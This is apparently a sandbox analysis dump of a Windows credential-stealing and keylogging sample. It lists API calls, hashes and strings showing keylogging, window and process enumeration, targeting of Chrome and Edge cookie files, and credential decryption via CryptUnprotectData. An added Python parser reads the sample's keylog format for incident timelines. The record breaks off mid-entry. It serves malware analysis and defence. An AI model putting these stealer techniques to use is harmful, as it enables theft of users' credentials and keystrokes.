                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                          • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                          • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                          • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                          APIs
                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                          • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseHandleOpen$FileImageName
                                          • String ID:
                                          • API String ID: 2951400881-0
                                          • Opcode ID: ba3ea50cb646477030606071dcac17ec13321efbd804a8471714c0f1fa06d59f
                                          • Instruction ID: eb9e11a2b0883253d54455b1eb0df9c10e535dd1e95c930e162dea6fb874dde8
                                          • Opcode Fuzzy Hash: ba3ea50cb646477030606071dcac17ec13321efbd804a8471714c0f1fa06d59f
                                          • Instruction Fuzzy Hash: 2F01F231680215ABD71066949C8AFA7B66C8B84756F0001ABFA08D2292EE74CD81466A
                                          APIs
                                          • _free.LIBCMT ref: 00450A54
                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00450A66
                                          • _free.LIBCMT ref: 00450A78
                                          • _free.LIBCMT ref: 00450A8A
                                          • _free.LIBCMT ref: 00450A9C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                          • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                          • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                          APIs
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0041763E
                                          • GetWindowTextW.USER32(?,?,0000012C), ref: 00417670
                                          • IsWindowVisible.USER32(?), ref: 00417677
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessWindow$Open$TextThreadVisible
                                          • String ID: (VG
                                          • API String ID: 3142014140-3443974315
                                          • Opcode ID: 24a09c8c4158ed3c0f2a795a4f0c90660d34be4f6c7f404af54177f4e0279c8e
                                          • Instruction ID: 57afc706987f0d359dfa573bc041c79e98ae29994c94316b8148008c339bd05b
                                          • Opcode Fuzzy Hash: 24a09c8c4158ed3c0f2a795a4f0c90660d34be4f6c7f404af54177f4e0279c8e
                                          • Instruction Fuzzy Hash: 6E7109311082419AC365FB22D8959EFB3E5BFD4308F50493FF18A560E5EF746A49CB8A
                                          APIs
                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Enum$InfoQueryValue
                                          • String ID: [regsplt]
                                          • API String ID: 3554306468-4262303796
                                          • Opcode ID: 1912cc85047d6fe9aebfeeb23cc0088c2f2b9ee1c1f314ee2953c53dd398c46e
                                          • Instruction ID: fa843d34e07254c46a29a5d4d7bbb73928c81f50e0ccc4a220fcc0531dc04ae2
                                          • Opcode Fuzzy Hash: 1912cc85047d6fe9aebfeeb23cc0088c2f2b9ee1c1f314ee2953c53dd398c46e
                                          • Instruction Fuzzy Hash: DF512C72900219AADB11EB95DC86EEEB77DAF04304F1000BAE505F6191EF746B48CBA9
                                          APIs
                                          • _strpbrk.LIBCMT ref: 0044E7B8
                                          • _free.LIBCMT ref: 0044E8D5
                                            • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                            • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                            • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                          • String ID: *?$.
                                          • API String ID: 2812119850-3972193922
                                          • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                          • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                          • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                          • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                          • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                          • String ID: /sort "Visit Time" /stext "$@NG
                                          • API String ID: 368326130-3944316004
                                          • Opcode ID: 224469ff984c8010abbfb6a0adb632b57bdffdcff036d90cee6eba18a73402bb
                                          • Instruction ID: 88307c0d9f74f86904655d2c31cb74d6ebeba16a9e6c7dae8368527950f1c452
                                          • Opcode Fuzzy Hash: 224469ff984c8010abbfb6a0adb632b57bdffdcff036d90cee6eba18a73402bb
                                          • Instruction Fuzzy Hash: EB316171A001195ACB15FBA6DC969ED7375AF90308F00007FF60AB71E2EF785E49CA99
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                            • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                          • _free.LIBCMT ref: 0044F050
                                          • _free.LIBCMT ref: 0044F086
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorLast_abort
                                          • String ID: 0ce$0ce
                                          • API String ID: 2991157371-2458816431
                                          • Opcode ID: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                          • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                          • Opcode Fuzzy Hash: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                          • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                          APIs
                                            • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                          Strings
                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                          • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                          • API String ID: 1174141254-1980882731
                                          • Opcode ID: 97a5ada962bae72897b7f94b11cd40aa52c1d6f994a23f407ee9340b66b1d139
                                          • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                          • Opcode Fuzzy Hash: 97a5ada962bae72897b7f94b11cd40aa52c1d6f994a23f407ee9340b66b1d139
                                          • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                          APIs
                                            • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                          Strings
                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                          • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                          • API String ID: 1174141254-1980882731
                                          • Opcode ID: e30cb4288211014db5c272c31aa753e5001111b8c3c97bf560fde133b4847c17
                                          • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                          • Opcode Fuzzy Hash: e30cb4288211014db5c272c31aa753e5001111b8c3c97bf560fde133b4847c17
                                          • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                          APIs
                                          • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                          • wsprintfW.USER32 ref: 0040B22E
                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EventLocalTimewsprintf
                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                          • API String ID: 1497725170-1359877963
                                          • Opcode ID: 598e0a7c0d0d0e60a2011044f18d65c28a10592999ecdaed1c3cad85e009971a
                                          • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                          • Opcode Fuzzy Hash: 598e0a7c0d0d0e60a2011044f18d65c28a10592999ecdaed1c3cad85e009971a
                                          • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                          APIs
                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                          • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$LocalTime$wsprintf
                                          • String ID: Online Keylogger Started
                                          • API String ID: 112202259-1258561607
                                          • Opcode ID: a7321385670445bfa9baf585f8c9fa904332ec5059089b328e401a783e90a250
                                          • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                          • Opcode Fuzzy Hash: a7321385670445bfa9baf585f8c9fa904332ec5059089b328e401a783e90a250
                                          • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
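The two records above (the GetLocalTime/wsprintfW routine at 0040B19F and the CreateThread routine that carries the "Online Keylogger Started" string) show how this sample stamps its keystroke log. The parser below is an added example for timeline reconstruction; it is not code from the report or from the sample. It assumes that a log entry header is the two fragments listed in the String ID, "[%04i/%02i/%02i %02i:%02i:%02i " followed by "]", that whatever the sample writes between those fragments can be treated as an opaque label (the report does not show that middle part), and that the captured keystrokes follow on the next lines until the next header. The log text inside the block is constructed for the example.

```python
"""Parse keystroke-log entries in the header format built by the sample's
wsprintfW call.  Added example for timeline work, not code from the report
or from the sample.  Entry layout beyond the two header fragments shown in
the report is an assumption."""
import re
from datetime import datetime
from typing import List, Tuple

# Header = "[%04i/%02i/%02i %02i:%02i:%02i " + <unknown middle> + "]".
# The middle part is not visible in the report, so it is captured as an
# opaque label (assumption); an empty middle gives "[YYYY/MM/DD HH:MM:SS ]".
HEADER_RE = re.compile(
    r"^\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) ?(.*?)\]$"
)


def parse_keylog(text: str) -> List[Tuple[datetime, str, str]]:
    """Split a log into (timestamp, label, captured_text) tuples.

    Lines before the first header (e.g. a 'Online Keylogger Started'
    banner) are ignored.  The timestamp is taken verbatim: the sample calls
    GetLocalTime, so it is the victim machine's local clock, not UTC.
    """
    entries: List[List] = []
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            y, mo, d, h, mi, s = (int(x) for x in m.groups()[:6])
            entries.append([datetime(y, mo, d, h, mi, s), m.group(7), ""])
        elif entries:
            # Keystroke text belongs to the most recent header.
            entries[-1][2] += line + "\n"
    return [(ts, label, body.rstrip("\n")) for ts, label, body in entries]


def entries_sorted(text: str) -> List[Tuple[datetime, str, str]]:
    """Same as parse_keylog but ordered by timestamp, which matters when
    several log files from one host are concatenated for a timeline."""
    return sorted(parse_keylog(text), key=lambda e: e[0])


# Constructed sample log, not taken from any real infection.
SAMPLE_LOG = """\
Online Keylogger Started
[2024/11/21 10:07:02 Sign in - Google Chrome]
user@example.com
[2024/11/21 10:05:30 Untitled - Notepad]
hello world
second line
[2024/11/21 10:09:00 ]
"""

if __name__ == "__main__":
    for ts, label, body in entries_sorted(SAMPLE_LOG):
        print(ts.isoformat(), repr(label), repr(body))
```

Because the stamp comes from GetLocalTime, convert the parsed values with the infected host's timezone before merging them with UTC-based telemetry such as EDR or proxy logs; otherwise keystroke events will be offset from the rest of the timeline by the host's UTC offset.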
                                          APIs
                                          • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                          • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: CryptUnprotectData$crypt32
                                          • API String ID: 2574300362-2380590389
                                          • Opcode ID: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
                                          • Instruction ID: 345ee013d26fc91f442c93551971226c597518e80cf45168a44a65f4e30a47e9
                                          • Opcode Fuzzy Hash: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
                                          • Instruction Fuzzy Hash: 1D01F575A00215BBCB18CFAC8C409AF7BB8EB85300F0041BEE94AE3381DA34AD00CB94
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                          • CloseHandle.KERNEL32(?), ref: 004051CA
                                          • SetEvent.KERNEL32(?), ref: 004051D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandleObjectSingleWait
                                          • String ID: Connection Timeout
                                          • API String ID: 2055531096-499159329
                                          • Opcode ID: aea94675e7c534c52cb53f54c205b860b10a02e3c4213e765d5fd14c325240d7
                                          • Instruction ID: 0252d74fe4ede7253ae2eff4a1d35319ac7a80acec65437dc80477e116da68d3
                                          • Opcode Fuzzy Hash: aea94675e7c534c52cb53f54c205b860b10a02e3c4213e765d5fd14c325240d7
                                          • Instruction Fuzzy Hash: 4A01F530A40F00AFD7216F368D8642BBFE0EB00306704093FE68356AE2D6789800CF89
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
